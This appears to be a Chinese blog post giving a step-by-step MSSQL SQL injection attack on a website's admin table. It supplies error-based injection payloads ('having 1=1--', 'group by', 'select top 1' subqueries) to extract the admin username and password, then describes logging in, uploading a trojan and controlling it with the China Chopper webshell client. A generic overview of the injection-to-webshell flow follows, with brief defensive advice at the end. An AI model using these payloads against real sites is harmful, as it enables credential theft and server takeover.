MSSQL注入之木马上传拿webshell

1.检测是否存在注入点:依次添加语句',and 1=1和and 1=2,来判断网站是否存在注入点

2.利用语句:a' having 1=1--爆出表名和字段名AdminUser.AdminId

3.接着爆出其他字段:

a' group by adminuser.adminid having 1=1--  //爆出用户名字段

a' group by adminuser.adminid,adminuser.username having 1=1-- //爆出密码字段

4.爆用户名和密码:

' and (select top 1 adminuser.username from adminuser)>0 //爆用户名

' and (select top 1 adminuser.password from adminuser)>0 //爆密码

5.用猜出的用户名和密码登录后台

6.查找可以上传的地方,上传本地木马文件(如果过滤不严,可以直接上传),记录木马的路径

7.使用中国菜刀连接木马,拿到webshell


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
首先,需要了解什么是SQL注入WebshellSQL注入是指攻击者通过在Web应用程序中注入恶意的SQL语句,从而能够访问或修改数据库中的数据,甚至控制整个Web应用程序。而Webshell是指一种可以在Web服务器上执行命令的脚本程序,攻击者可以通过上传Webshell来获取服务器的控制权。 下面是SQL注入上传Webshell的分析流程: 1. 确认注入点:使用SQL注入工具(例如SQLmap)扫描目标站点,确认是否存在注入点。一旦找到注入点,就可以开始进行注入测试。 2. 判断数据库类型:根据不同的数据库类型(例如MySQLSQL Server等),使用不同的注入语句进行测试,以确定目标站点所使用的数据库类型。 3. 获取数据库权限:使用注入语句,获取数据库的权限(例如管理员权限),以便后续操作。 4. 上传Webshell:使用注入语句,上传Webshell。具体的上传方式可以通过以下几种方法: - 利用数据库中已有的函数或存储过程上传Webshell; - 利用操作系统命令执行上传Webshell; - 利用网站自身的文件上传功能上传Webshell。 5. 控制Web服务器:使用上传Webshell,控制Web服务器,执行各种恶意操作,例如获取敏感数据、攻击其他网站等。 为防止此类攻击,我们应该加强Web应用程序的安全性,例如使用安全的编程语言、编写安全的代码、禁用不必要的功能、限制用户输入等等。同时,也要定期对Web应用程序进行安全性评估和漏洞扫描,及时发现并修复漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值